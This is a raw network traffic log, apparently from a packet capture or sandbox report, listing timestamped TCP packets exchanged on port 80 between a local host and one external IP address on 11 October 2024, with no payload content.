                                                                                                                                                              Oct 11, 2024 22:32:27.924644947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924654961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924671888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924690962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924700975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924700975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924700975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924700975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924705029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924721956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924736977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924748898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924766064 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924770117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924770117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924770117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924781084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924798965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924810886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924824953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924837112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924854040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924866915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924885035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924894094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924894094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924894094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924894094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924894094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924902916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924916983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924932957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924942970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924963951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924973011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.924990892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924990892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924990892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.924990892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925055981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925055981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925246000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925338984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925389051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925400972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925419092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925430059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925447941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925465107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925479889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925493002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925499916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925499916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925499916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925499916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925517082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925522089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925529003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925548077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925559998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925578117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925591946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925609112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925662041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925749063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925781012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925791979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925806999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925832033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925834894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925834894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925848961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925892115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925904989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925923109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925936937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.925968885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925968885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925968885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925968885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.925968885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926011086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926054955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926065922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926076889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926091909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926109076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926119089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926119089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926139116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926187038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926197052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926255941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926259995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926270008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926295042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926310062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926317930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926317930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926320076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926338911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926338911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926345110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926357031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926357031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926376104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926395893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926405907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926419020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926419020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926419020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926428080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926430941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926440001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926461935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926471949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926479101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926479101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926490068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926498890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926577091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926577091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926688910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926698923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926714897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926729918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926739931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926752090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926752090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926752090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926759958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926794052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926821947 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926850080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926861048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926879883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926891088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926906109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926906109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926908970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926927090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926937103 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926947117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926947117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926948071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.926955938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.926971912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:27.927035093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.927035093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:27.927035093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.012018919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.012164116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073539019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073563099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073589087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073601961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073618889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073628902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073645115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073657990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073669910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073699951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073712111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073729992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073740005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073759079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073760986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073760986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073760986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073760986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073760986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073798895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073807955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073823929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073836088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073838949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073838949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073854923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073865891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073884010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073904037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073915005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073935986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073942900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073942900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073942900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073945045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073942900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073944092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.073965073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073985100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.073997021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074007034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074007034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074011087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074021101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074034929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074043036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074048996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074070930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074079990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074135065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074136019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074135065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074135065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074135065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074147940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074168921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074176073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074191093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074203014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074222088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074234009 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074248075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074263096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074263096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074264050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074263096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074263096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074263096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074286938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074299097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074305058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074305058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074320078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074331999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074348927 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074362040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074374914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074389935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074404001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074470997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074668884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074680090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074698925 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074712038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074814081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074814081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074814081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074815035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074827909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074847937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074847937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074861050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074879885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074882030 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074894905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074911118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074923038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074939966 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074950933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.074955940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074955940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.074955940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075078011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075078964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075114012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075124979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075144053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075158119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075170994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075186968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075198889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075220108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075229883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075237989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075237989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075237989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075237989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075237989 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075246096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075273037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075273037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075308084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075503111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075514078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075531960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075654984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075666904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075683117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075683117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075683117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075683117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075690985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075702906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075707912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:28.075722933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075737000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075759888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:28.075769901 CEST804970745.66.249.162192.168.2.8
